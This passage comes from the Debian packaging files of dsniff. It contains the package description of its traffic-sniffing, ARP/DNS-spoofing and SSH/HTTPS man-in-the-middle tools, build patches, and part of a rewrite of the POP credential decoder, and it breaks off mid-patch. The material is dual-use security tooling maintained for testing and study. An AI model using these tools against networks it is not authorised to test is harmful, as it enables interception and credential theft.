uint32_t crc32_update(const void *buf, size_t len, uint32_t crc); 13 | uint32_t crc32(const void *buf, size_t len); 14 | 15 | #endif /* __DS_CRC32_H__ */ 16 | -------------------------------------------------------------------------------- /debian/README.Debian: -------------------------------------------------------------------------------- 1 | dsniff for Debian 2 | ----------------- 3 | 4 | The latest upstream release of dsniff is from 2002. Notable changes made to 5 | the Debian version of dsniff include: 6 | * the -p option was added to support processing already captured traffic (pcap 7 | file) in addition to capturing directly from a network interface 8 | * the -c and -r options were added to arpspoof (see man page for details) 9 | * small improvements to protocol decoders have been made 10 | 11 | -- Lukas Schwaighofer , Wed, 03 May 2017 19:48:27 +0200 12 | -------------------------------------------------------------------------------- /debian/README.source: -------------------------------------------------------------------------------- 1 | This package uses quilt to manage all modifications to the upstream 2 | source. Changes are stored in the source package as diffs in 3 | debian/patches and applied during the build. 4 | 5 | To configure quilt to use debian/patches instead of patches, you want 6 | either to export QUILT_PATCHES=debian/patches in your environment 7 | or use this snippet in your ~/.quiltrc: 8 | 9 | for where in ./ ../ ../../ ../../../ ../../../../ ../../../../../; do 10 | if [ -e ${where}debian/rules -a -d ${where}debian/patches ]; then 11 | export QUILT_PATCHES=debian/patches 12 | break 13 | fi 14 | done 15 | 16 | To get the fully patched source after unpacking the source package, cd to 17 | the root level of the source package and run: 18 | 19 | quilt push -a 20 | 21 | The last patch listed in debian/patches/series will become the current 22 | patch. 23 | 24 | To add a new set of changes, first run quilt push -a, and then run: 25 | 26 | quilt new 27 | 28 | where is a descriptive name for the patch, used as the filename in 29 | debian/patches. Then, for every file that will be modified by this patch, 30 | run: 31 | 32 | quilt add 33 | 34 | before editing those files. You must tell quilt with quilt add what files 35 | will be part of the patch before making changes or quilt will not work 36 | properly. After editing the files, run: 37 | 38 | quilt refresh 39 | 40 | to save the results as a patch. 41 | 42 | Alternately, if you already have an external patch and you just want to 43 | add it to the build system, run quilt push -a and then: 44 | 45 | quilt import -P /path/to/patch 46 | quilt push -a 47 | 48 | (add -p 0 to quilt import if needed). as above is the filename to 49 | use in debian/patches. The last quilt push -a will apply the patch to 50 | make sure it works properly. 51 | 52 | To remove an existing patch from the list of patches that will be applied, 53 | run: 54 | 55 | quilt delete 56 | 57 | You may need to run quilt pop -a to unapply patches first before running 58 | this command. 59 | -------------------------------------------------------------------------------- /debian/control: -------------------------------------------------------------------------------- 1 | Source: dsniff 2 | Section: net 3 | Priority: optional 4 | Maintainer: Debian Security Tools 5 | Uploaders: Marcos Fouces , Lukas Schwaighofer 6 | Standards-Version: 4.6.1 7 | Build-Depends: libdb-dev, libpcap0.8-dev, libnids-dev, libssl-dev, libxmu-dev, libnet1-dev, debhelper-compat (= 13) 8 | Homepage: https://www.monkey.org/~dugsong/dsniff/ 9 | Vcs-Git: https://salsa.debian.org/pkg-security-team/dsniff.git 10 | Vcs-Browser: https://salsa.debian.org/pkg-security-team/dsniff 11 | Rules-Requires-Root: no 12 | 13 | Package: dsniff 14 | Architecture: any 15 | Depends: ${shlibs:Depends}, ${misc:Depends}, openssl 16 | Description: Various tools to sniff network traffic for cleartext insecurities 17 | This package contains several tools to listen to and create network traffic: 18 | . 19 | * arpspoof - Send out unrequested (and possibly forged) arp replies. 20 | * dnsspoof - forge replies to arbitrary DNS address / pointer queries 21 | on the Local Area Network. 22 | * dsniff - password sniffer for several protocols. 23 | * filesnarf - saves selected files sniffed from NFS traffic. 24 | * macof - flood the local network with random MAC addresses. 25 | * mailsnarf - sniffs mail on the LAN and stores it in mbox format. 26 | * msgsnarf - record selected messages from different Instant Messengers. 27 | * sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic. 28 | * sshow - SSH traffic analyser. 29 | * tcpkill - kills specified in-progress TCP connections. 30 | * tcpnice - slow down specified TCP connections via "active" 31 | traffic shaping. 32 | * urlsnarf - output selected URLs sniffed from HTTP traffic in CLF. 33 | * webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies. 34 | * webspy - sends URLs sniffed from a client to your local browser 35 | (requires libx11-6 installed). 36 | . 37 | Please do not abuse this software. 38 | -------------------------------------------------------------------------------- /debian/copyright: -------------------------------------------------------------------------------- 1 | Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ 2 | Upstream-Name: dsniff 3 | Source: https://www.monkey.org/~dugsong/dsniff/ 4 | The CVS directory is useless for packaging. 5 | Files-Excluded: CVS/* 6 | 7 | Files: * 8 | Copyright: 1999-2000 Dug Song 9 | License: BSD-3-Clause 10 | 11 | Files: debian/* 12 | Copyright: 2016-2022 Marcos Fouces 13 | 2018 Samuel Henrique 14 | 2013 Andrew Shadura 15 | 2011-2012 William Vera 16 | 2011 Ondřej Surý 17 | 2006-2011 Luciano Bello 18 | 2005-2006 Faidon Liambotis 19 | 2003-2005 Steve Kemp 20 | 2002 Samuele Giovanni Tonon 21 | 2001 Peter Palfrader 22 | 2000-2001 Robert van der Meulen 23 | 2000 David M. Zendzian 24 | License: BSD-3-Clause 25 | 26 | License: BSD-3-Clause 27 | Redistribution and use in source and binary forms, with or without 28 | modification, are permitted provided that the following conditions 29 | are met: 30 | . 31 | 1. Redistributions of source code must retain the above copyright 32 | notice, this list of conditions and the following disclaimer. 33 | 2. Redistributions in binary form must reproduce the above copyright 34 | notice, this list of conditions and the following disclaimer in the 35 | documentation and/or other materials provided with the distribution. 36 | 3. The name of author may not be used to endorse or promote products 37 | derived from this software without specific prior written permission. 38 | . 39 | THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 40 | INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 41 | AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 42 | THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 43 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 44 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 45 | OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 46 | WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 47 | OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 48 | ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 49 | -------------------------------------------------------------------------------- /debian/docs: -------------------------------------------------------------------------------- 1 | README 2 | -------------------------------------------------------------------------------- /debian/gbp.conf: -------------------------------------------------------------------------------- 1 | [DEFAULT] 2 | debian-branch = debian/master 3 | pristine-tar = True 4 | 5 | [buildpackage] 6 | sign-tags = True 7 | 8 | [import-orig] 9 | filter-pristine-tar = True 10 | 11 | [pq] 12 | patch-numbers = False 13 | 14 | [dch] 15 | multimaint-merge = True 16 | -------------------------------------------------------------------------------- /debian/patches/01_time.h.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: Include to fix segfault on some architectures. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=315969 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/msgsnarf.c 8 | +++ b/msgsnarf.c 9 | @@ -23,6 +23,7 @@ 10 | #include 11 | #include 12 | #include 13 | +#include 14 | 15 | #include "buf.h" 16 | #include "decode.h" 17 | --- a/sshow.c 18 | +++ b/sshow.c 19 | @@ -15,6 +15,7 @@ 20 | 21 | #include 22 | #include 23 | +#include 24 | 25 | #include 26 | #include 27 | -------------------------------------------------------------------------------- /debian/patches/02_mailsnarf_corrupt.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: mailsnarf does not parse mail correctly. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=149330 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/mailsnarf.c 8 | +++ b/mailsnarf.c 9 | @@ -178,7 +178,7 @@ 10 | if (smtp->state != SMTP_DATA) { 11 | while ((i = buf_index(&buf, "\r\n", 2)) >= 0) { 12 | line = buf_tok(&buf, NULL, i + 2); 13 | - line->base[line->end] = '\0'; 14 | + line->base[line->end-1] = '\0'; 15 | p = buf_ptr(line); 16 | 17 | if (strncasecmp(p, "RSET", 4) == 0) { 18 | -------------------------------------------------------------------------------- /debian/patches/04_multiple_intf.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: Work with multiple interfaces. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=242369 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/arp.c 8 | +++ b/arp.c 9 | @@ -39,7 +39,7 @@ 10 | 11 | #ifdef BSD 12 | int 13 | -arp_cache_lookup(in_addr_t ip, struct ether_addr *ether) 14 | +arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf) 15 | { 16 | int mib[6]; 17 | size_t len; 18 | @@ -91,7 +91,7 @@ 19 | #endif 20 | 21 | int 22 | -arp_cache_lookup(in_addr_t ip, struct ether_addr *ether) 23 | +arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* lif) 24 | { 25 | int sock; 26 | struct arpreq ar; 27 | @@ -99,7 +99,7 @@ 28 | 29 | memset((char *)&ar, 0, sizeof(ar)); 30 | #ifdef __linux__ 31 | - strncpy(ar.arp_dev, "eth0", sizeof(ar.arp_dev)); /* XXX - *sigh* */ 32 | + strncpy(ar.arp_dev, lif, strlen(lif)); 33 | #endif 34 | sin = (struct sockaddr_in *)&ar.arp_pa; 35 | sin->sin_family = AF_INET; 36 | --- a/arp.h 37 | +++ b/arp.h 38 | @@ -11,6 +11,6 @@ 39 | #ifndef _ARP_H_ 40 | #define _ARP_H_ 41 | 42 | -int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether); 43 | +int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf); 44 | 45 | #endif /* _ARP_H_ */ 46 | --- a/arpspoof.c 47 | +++ b/arpspoof.c 48 | @@ -113,7 +113,7 @@ 49 | int i = 0; 50 | 51 | do { 52 | - if (arp_cache_lookup(ip, mac) == 0) 53 | + if (arp_cache_lookup(ip, mac, intf) == 0) 54 | return (1); 55 | #ifdef __linux__ 56 | /* XXX - force the kernel to arp. feh. */ 57 | -------------------------------------------------------------------------------- /debian/patches/06_urlsnarf_zeropad.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: urlsnarf: zero-pad date. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=298605 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/urlsnarf.c 8 | +++ b/urlsnarf.c 9 | @@ -68,7 +68,7 @@ 10 | t->tm_hour - gmt.tm_hour); 11 | tz = hours * 60 + t->tm_min - gmt.tm_min; 12 | 13 | - len = strftime(tstr, sizeof(tstr), "%e/%b/%Y:%X", t); 14 | + len = strftime(tstr, sizeof(tstr), "%d/%b/%Y:%X", t); 15 | if (len < 0 || len > sizeof(tstr) - 5) 16 | return (NULL); 17 | 18 | -------------------------------------------------------------------------------- /debian/patches/08_openssl-0.9.8.patch: -------------------------------------------------------------------------------- 1 | Author: 2 | Description: Fix FTBFS with openssl. 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/ssh.c 7 | +++ b/ssh.c 8 | @@ -16,6 +16,7 @@ 9 | #include 10 | #include 11 | #include 12 | +#include 13 | 14 | #include 15 | #include 16 | -------------------------------------------------------------------------------- /debian/patches/09_sysconf_clocks.patch: -------------------------------------------------------------------------------- 1 | Author: 2 | Description: Fix FTBFS: ./sshow.c:226: error: 'CLK_TCK' undeclared. 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/sshow.c 7 | +++ b/sshow.c 8 | @@ -217,6 +217,7 @@ 9 | { 10 | clock_t delay; 11 | int payload; 12 | + long CLK_TCK= sysconf(_SC_CLK_TCK); 13 | 14 | delay = add_history(session, 0, cipher_size, plain_range); 15 | 16 | @@ -265,6 +266,7 @@ 17 | clock_t delay; 18 | int skip; 19 | range string_range; 20 | + long CLK_TCK= sysconf(_SC_CLK_TCK); 21 | 22 | delay = add_history(session, 1, cipher_size, plain_range); 23 | 24 | -------------------------------------------------------------------------------- /debian/patches/10_urlsnarf_escape.patch: -------------------------------------------------------------------------------- 1 | Author: Hilko Bengen 2 | Description: Escape user, vhost, uri, referer, agent strings in log. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=372536 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/urlsnarf.c 8 | +++ b/urlsnarf.c 9 | @@ -84,6 +84,43 @@ 10 | return (tstr); 11 | } 12 | 13 | +static char * 14 | +escape_log_entry(char *string) 15 | +{ 16 | + char *out; 17 | + unsigned char *c, *o; 18 | + size_t len; 19 | + 20 | + if (!string) 21 | + return NULL; 22 | + 23 | + /* Determine needed length */ 24 | + for (c = string, len = 0; *c; c++) { 25 | + if ((*c < 32) || (*c >= 128)) 26 | + len += 4; 27 | + else if ((*c == '"') || (*c =='\\')) 28 | + len += 2; 29 | + else 30 | + len++; 31 | + } 32 | + out = malloc(len+1); 33 | + if (!out) 34 | + return NULL; 35 | + for (c = string, o = out; *c; c++, o++) { 36 | + if ((*c < 32) || (*c >= 128)) { 37 | + snprintf(o, 5, "\\x%02x", *c); 38 | + o += 3; 39 | + } else if ((*c == '"') || ((*c =='\\'))) { 40 | + *(o++) = '\\'; 41 | + *o = *c; 42 | + } else { 43 | + *o = *c; 44 | + } 45 | + } 46 | + out[len]='\0'; 47 | + return out; 48 | +} 49 | + 50 | static int 51 | process_http_request(struct tuple4 *addr, u_char *data, int len) 52 | { 53 | @@ -142,18 +179,26 @@ 54 | buf_tok(NULL, NULL, i); 55 | } 56 | } 57 | - if (user == NULL) 58 | - user = "-"; 59 | - if (vhost == NULL) 60 | - vhost = libnet_addr2name4(addr->daddr, Opt_dns); 61 | - if (referer == NULL) 62 | - referer = "-"; 63 | - if (agent == NULL) 64 | - agent = "-"; 65 | - 66 | + user = escape_log_entry(user); 67 | + vhost = escape_log_entry(vhost); 68 | + uri = escape_log_entry(uri); 69 | + referer = escape_log_entry(referer); 70 | + agent = escape_log_entry(agent); 71 | + 72 | printf("%s - %s [%s] \"%s http://%s%s\" - - \"%s\" \"%s\"\n", 73 | libnet_addr2name4(addr->saddr, Opt_dns), 74 | - user, timestamp(), req, vhost, uri, referer, agent); 75 | + (user?user:"-"), 76 | + timestamp(), req, 77 | + (vhost?vhost:libnet_addr2name4(addr->daddr, Opt_dns)), 78 | + uri, 79 | + (referer?referer:"-"), 80 | + (agent?agent:"-")); 81 | + 82 | + free(user); 83 | + free(vhost); 84 | + free(uri); 85 | + free(referer); 86 | + free(agent); 87 | } 88 | fflush(stdout); 89 | 90 | -------------------------------------------------------------------------------- /debian/patches/11_string_header.patch: -------------------------------------------------------------------------------- 1 | Author: Luciano Bello 2 | Description: Avoid the "implicit declaration of function 'str*'" warning 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/arp.c 7 | +++ b/arp.c 8 | @@ -34,6 +34,7 @@ 9 | #include 10 | #include 11 | #include 12 | +#include 13 | 14 | #include "arp.h" 15 | 16 | --- a/buf.c 17 | +++ b/buf.c 18 | @@ -17,6 +17,7 @@ 19 | #include 20 | #include 21 | #include 22 | +#include 23 | 24 | #include "buf.h" 25 | 26 | --- a/decode_nntp.c 27 | +++ b/decode_nntp.c 28 | @@ -15,6 +15,7 @@ 29 | 30 | #include 31 | #include 32 | +#include 33 | 34 | #include "base64.h" 35 | #include "decode.h" 36 | --- a/decode_pop.c 37 | +++ b/decode_pop.c 38 | @@ -14,6 +14,7 @@ 39 | 40 | #include 41 | #include 42 | +#include 43 | 44 | #include "base64.h" 45 | #include "options.h" 46 | --- a/decode_rlogin.c 47 | +++ b/decode_rlogin.c 48 | @@ -14,6 +14,8 @@ 49 | 50 | #include 51 | #include 52 | +#include 53 | +#include 54 | 55 | #include "options.h" 56 | #include "decode.h" 57 | --- a/decode_smb.c 58 | +++ b/decode_smb.c 59 | @@ -15,6 +15,7 @@ 60 | 61 | #include 62 | #include 63 | +#include 64 | 65 | #include "decode.h" 66 | 67 | --- a/decode_smtp.c 68 | +++ b/decode_smtp.c 69 | @@ -14,6 +14,7 @@ 70 | 71 | #include 72 | #include 73 | +#include 74 | 75 | #include "base64.h" 76 | #include "options.h" 77 | --- a/decode_sniffer.c 78 | +++ b/decode_sniffer.c 79 | @@ -15,6 +15,8 @@ 80 | 81 | #include 82 | #include 83 | +#include 84 | +#include 85 | 86 | #include "base64.h" 87 | #include "decode.h" 88 | --- a/decode_socks.c 89 | +++ b/decode_socks.c 90 | @@ -14,6 +14,7 @@ 91 | 92 | #include 93 | #include 94 | +#include 95 | 96 | #include "decode.h" 97 | 98 | --- a/decode_tds.c 99 | +++ b/decode_tds.c 100 | @@ -18,6 +18,7 @@ 101 | 102 | #include 103 | #include 104 | +#include 105 | 106 | #include "decode.h" 107 | 108 | --- a/decode_telnet.c 109 | +++ b/decode_telnet.c 110 | @@ -14,6 +14,7 @@ 111 | 112 | #include 113 | #include 114 | +#include 115 | 116 | #include "options.h" 117 | #include "decode.h" 118 | --- a/decode_x11.c 119 | +++ b/decode_x11.c 120 | @@ -14,6 +14,8 @@ 121 | 122 | #include 123 | #include 124 | +#include 125 | +#include 126 | 127 | #include "decode.h" 128 | 129 | --- a/dnsspoof.c 130 | +++ b/dnsspoof.c 131 | @@ -20,6 +20,7 @@ 132 | #include 133 | #include 134 | #include 135 | +#include 136 | #include 137 | #include 138 | #include 139 | --- a/magic.c 140 | +++ b/magic.c 141 | @@ -36,6 +36,7 @@ 142 | #include 143 | #include 144 | #include 145 | +#include 146 | #include 147 | #include 148 | #include 149 | --- /dev/null 150 | +++ b/missing/strlcat.h 151 | @@ -0,0 +1 @@ 152 | +size_t strlcat(char *dst, const char *src, size_t siz); 153 | --- /dev/null 154 | +++ b/missing/strlcpy.h 155 | @@ -0,0 +1 @@ 156 | +size_t strlcpy(char *dst, const char *src, size_t siz); 157 | --- a/sshmitm.c 158 | +++ b/sshmitm.c 159 | @@ -24,6 +24,7 @@ 160 | #include 161 | #include 162 | #include 163 | +#include 164 | 165 | #include "buf.h" 166 | #include "record.h" 167 | -------------------------------------------------------------------------------- /debian/patches/12_arpa_inet_header.patch: -------------------------------------------------------------------------------- 1 | Author: Luciano Bello 2 | Description: avoid the "implicit declaration of function 'ntohs'" warning 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/decode_aim.c 7 | +++ b/decode_aim.c 8 | @@ -14,6 +14,7 @@ 9 | 10 | #include 11 | #include 12 | +#include 13 | 14 | #include "hex.h" 15 | #include "buf.h" 16 | --- a/decode_mmxp.c 17 | +++ b/decode_mmxp.c 18 | @@ -21,6 +21,7 @@ 19 | 20 | #include 21 | #include 22 | +#include 23 | 24 | #include "buf.h" 25 | #include "decode.h" 26 | --- a/decode_pptp.c 27 | +++ b/decode_pptp.c 28 | @@ -16,6 +16,7 @@ 29 | 30 | #include 31 | #include 32 | +#include 33 | 34 | #include "buf.h" 35 | #include "decode.h" 36 | --- a/decode_tds.c 37 | +++ b/decode_tds.c 38 | @@ -19,6 +19,7 @@ 39 | #include 40 | #include 41 | #include 42 | +#include 43 | 44 | #include "decode.h" 45 | 46 | --- a/decode_vrrp.c 47 | +++ b/decode_vrrp.c 48 | @@ -15,6 +15,7 @@ 49 | 50 | #include 51 | #include 52 | +#include 53 | 54 | #include "buf.h" 55 | #include "decode.h" 56 | --- a/ssh.c 57 | +++ b/ssh.c 58 | @@ -23,6 +23,7 @@ 59 | #include 60 | #include 61 | #include 62 | +#include 63 | #include 64 | 65 | #include "hex.h" 66 | -------------------------------------------------------------------------------- /debian/patches/13_pop_with_version.patch: -------------------------------------------------------------------------------- 1 | Author: Luciano Bello 2 | Description: distinguish between pop versions 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/decode.c 7 | +++ b/decode.c 8 | @@ -63,7 +63,8 @@ 9 | { "http", decode_http }, 10 | { "ospf", decode_ospf }, 11 | { "poppass", decode_poppass }, 12 | - { "pop", decode_pop }, 13 | + { "pop2", decode_pop }, 14 | + { "pop3", decode_pop }, 15 | { "nntp", decode_nntp }, 16 | { "smb", decode_smb }, 17 | { "imap", decode_imap }, 18 | --- a/dsniff.services 19 | +++ b/dsniff.services 20 | @@ -10,8 +10,8 @@ 21 | ospf 89/ip 22 | http 98/tcp 23 | poppass 106/tcp 24 | -pop 109/tcp 25 | -pop 110/tcp 26 | +pop2 109/tcp 27 | +pop3 110/tcp 28 | portmap 111/tcp 29 | portmap -111/tcp 30 | portmap 111/udp 31 | -------------------------------------------------------------------------------- /debian/patches/14_obsolete_time.patch: -------------------------------------------------------------------------------- 1 | Author: Luciano Bello 2 | Description: According to /usr/include/time.h, CLK_TCK is the 3 | "obsolete POSIX.1-1988 name" for CLOCKS_PER_SEC. 4 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=420944 5 | --- 6 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 7 | 8 | --- a/sshow.c 9 | +++ b/sshow.c 10 | @@ -224,7 +224,7 @@ 11 | if (debug) 12 | printf("- %s -> %s: DATA (%s bytes, %.2f seconds)\n", 13 | s_saddr(ts), s_daddr(ts), s_range(plain_range), 14 | - (float)delay / CLK_TCK); 15 | + (float)delay / CLOCKS_PER_SEC); 16 | if (debug > 1) 17 | print_data(&ts->server, cipher_size); 18 | 19 | @@ -273,7 +273,7 @@ 20 | if (debug) 21 | printf("- %s <- %s: DATA (%s bytes, %.2f seconds)\n", 22 | s_saddr(ts), s_daddr(ts), s_range(plain_range), 23 | - (float)delay / CLK_TCK); 24 | + (float)delay / CLOCKS_PER_SEC); 25 | if (debug > 1) 26 | print_data(&ts->client, cipher_size); 27 | 28 | @@ -302,7 +302,7 @@ 29 | 30 | if (session->state == 1 && 31 | #ifdef USE_TIMING 32 | - now - get_history(session, 2)->timestamp >= CLK_TCK && 33 | + now - get_history(session, 2)->timestamp >= CLOCKS_PER_SEC && 34 | #endif 35 | session->protocol == 1 && 36 | (session->history.directions & 7) == 5 && 37 | -------------------------------------------------------------------------------- /debian/patches/15_checksum_libnids.patch: -------------------------------------------------------------------------------- 1 | Author: Gleb Paharenko 2 | Description: Workaround to this Debian bug 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=420129 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/dsniff.c 8 | +++ b/dsniff.c 9 | @@ -70,6 +70,80 @@ 10 | { 11 | } 12 | 13 | + 14 | +static int get_all_ifaces(struct ifreq **, int *); 15 | +static unsigned int get_addr_from_ifreq(struct ifreq *); 16 | + 17 | +int all_local_ipaddrs_chksum_disable() 18 | +{ 19 | + struct ifreq *ifaces; 20 | + int ifaces_count; 21 | + int i, ind = 0; 22 | + struct nids_chksum_ctl *ctlp; 23 | + unsigned int tmp; 24 | + 25 | + if (!get_all_ifaces(&ifaces, &ifaces_count)) 26 | + return -1; 27 | + ctlp = 28 | + (struct nids_chksum_ctl *) malloc(ifaces_count * 29 | + sizeof(struct 30 | + nids_chksum_ctl)); 31 | + if (!ctlp) 32 | + return -1; 33 | + for (i = 0; i < ifaces_count; i++) { 34 | + tmp = get_addr_from_ifreq(ifaces + i); 35 | + if (tmp) { 36 | + ctlp[ind].netaddr = tmp; 37 | + ctlp[ind].mask = inet_addr("255.255.255.255"); 38 | + ctlp[ind].action = NIDS_DONT_CHKSUM; 39 | + ind++; 40 | + } 41 | + } 42 | + free(ifaces); 43 | + nids_register_chksum_ctl(ctlp, ind); 44 | +} 45 | + 46 | +/* helper functions for Example 2 */ 47 | +unsigned int get_addr_from_ifreq(struct ifreq *iface) 48 | +{ 49 | + if (iface->ifr_addr.sa_family == AF_INET) 50 | + return ((struct sockaddr_in *) &(iface->ifr_addr))-> 51 | + sin_addr.s_addr; 52 | + return 0; 53 | +} 54 | + 55 | +static int get_all_ifaces(struct ifreq **ifaces, int *count) 56 | +{ 57 | + int ifaces_size = 8 * sizeof(struct ifreq); 58 | + struct ifconf param; 59 | + int sock; 60 | + unsigned int i; 61 | + 62 | + *ifaces = malloc(ifaces_size); 63 | + sock = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP); 64 | + if (sock <= 0) 65 | + return 0; 66 | + for (;;) { 67 | + param.ifc_len = ifaces_size; 68 | + param.ifc_req = *ifaces; 69 | + if (ioctl(sock, SIOCGIFCONF, ¶m)) 70 | + goto err; 71 | + if (param.ifc_len < ifaces_size) 72 | + break; 73 | + free(*ifaces); 74 | + ifaces_size *= 2; 75 | + ifaces = malloc(ifaces_size); 76 | + } 77 | + *count = param.ifc_len / sizeof(struct ifreq); 78 | + close(sock); 79 | + return 1; 80 | + err: 81 | + close(sock); 82 | + return 0; 83 | +} 84 | + 85 | + 86 | + 87 | int 88 | main(int argc, char *argv[]) 89 | { 90 | @@ -189,6 +263,8 @@ 91 | warnx("using %s", nids_params.filename); 92 | } 93 | } 94 | + 95 | + all_local_ipaddrs_chksum_disable(); 96 | 97 | nids_run(); 98 | 99 | -------------------------------------------------------------------------------- /debian/patches/16_TDS_decoder.patch: -------------------------------------------------------------------------------- 1 | Author: Luciano Bello 2 | Description: Fix for DOS y TDS decoder. Patch provided by Hilko Bengen. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=609988 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/decode_tds.c 8 | +++ b/decode_tds.c 9 | @@ -144,6 +144,11 @@ 10 | len > sizeof(*th) && len >= ntohs(th->size); 11 | buf += ntohs(th->size), len -= ntohs(th->size)) { 12 | 13 | + if (th->size != 8) { 14 | + /* wrong header length */ 15 | + break; 16 | + } 17 | + 18 | if (th->type == 2) { 19 | /* Version 4.x, 5.0 */ 20 | if (len < sizeof(*th) + sizeof(*tl)) 21 | -------------------------------------------------------------------------------- /debian/patches/17_checksum.patch: -------------------------------------------------------------------------------- 1 | Author: Piotr Engelking 2 | Description: Disable the filtering packets with incorrect checksum. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=372536 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/urlsnarf.c 8 | +++ b/urlsnarf.c 9 | @@ -245,6 +245,7 @@ 10 | extern char *optarg; 11 | extern int optind; 12 | int c; 13 | + struct nids_chksum_ctl chksum_ctl; 14 | 15 | while ((c = getopt(argc, argv, "i:p:nvh?V")) != -1) { 16 | switch (c) { 17 | @@ -305,6 +306,12 @@ 18 | } 19 | } 20 | 21 | + chksum_ctl.netaddr = 0; 22 | + chksum_ctl.mask = 0; 23 | + chksum_ctl.action = NIDS_DONT_CHKSUM; 24 | + 25 | + nids_register_chksum_ctl(&chksum_ctl, 1); 26 | + 27 | nids_run(); 28 | 29 | /* NOTREACHED */ 30 | -------------------------------------------------------------------------------- /debian/patches/18_sshcrypto.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: Missing openssl includes in sshcrypto.c. 3 | This patch was through diff.gz and now is implemented as a dpatch. 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/sshcrypto.c 8 | +++ b/sshcrypto.c 9 | @@ -14,6 +14,8 @@ 10 | 11 | #include 12 | #include 13 | +#include 14 | +#include 15 | 16 | #include 17 | #include 18 | -------------------------------------------------------------------------------- /debian/patches/19_rewrite-and-modernize-POP-decoder.patch: -------------------------------------------------------------------------------- 1 | >From b05e27ba9b0ba9ef00ad2183933652e08d8c89af Mon Sep 17 00:00:00 2001 2 | From: Stefan Tomanek 3 | Date: Sat, 29 Oct 2011 20:48:55 +0200 4 | Subject: [PATCH] rewrite and modernize POP decoder 5 | 6 | 7 | Signed-off-by: Stefan Tomanek 8 | --- 9 | decode_pop.c | 96 ++++++++++++++++++++++++++++++++++++++++++++++----------- 10 | 1 files changed, 77 insertions(+), 19 deletions(-) 11 | --- 12 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 13 | 14 | --- a/decode_pop.c 15 | +++ b/decode_pop.c 16 | @@ -6,6 +6,8 @@ 17 | * Copyright (c) 2000 Dug Song 18 | * 19 | * $Id: decode_pop.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 20 | + * 21 | + * Rewritten by Stefan Tomanek 2011 22 | */ 23 | 24 | #include "config.h" 25 | @@ -45,32 +47,88 @@ 26 | decode_pop(u_char *buf, int len, u_char *obuf, int olen) 27 | { 28 | char *p; 29 | + char *s; 30 | + int n; 31 | int i, j; 32 | + char *user; 33 | + char *password; 34 | + enum { 35 | + NONE, 36 | + AUTHPLAIN, 37 | + AUTHLOGIN, 38 | + USERPASS 39 | + } mode = NONE; 40 | + 41 | 42 | obuf[0] = '\0'; 43 | 44 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 45 | - if (strncasecmp(p, "AUTH PLAIN", 10) == 0 || 46 | - strncasecmp(p, "AUTH LOGIN", 10) == 0) { 47 | - strlcat(obuf, p, olen); 48 | - strlcat(obuf, "\n", 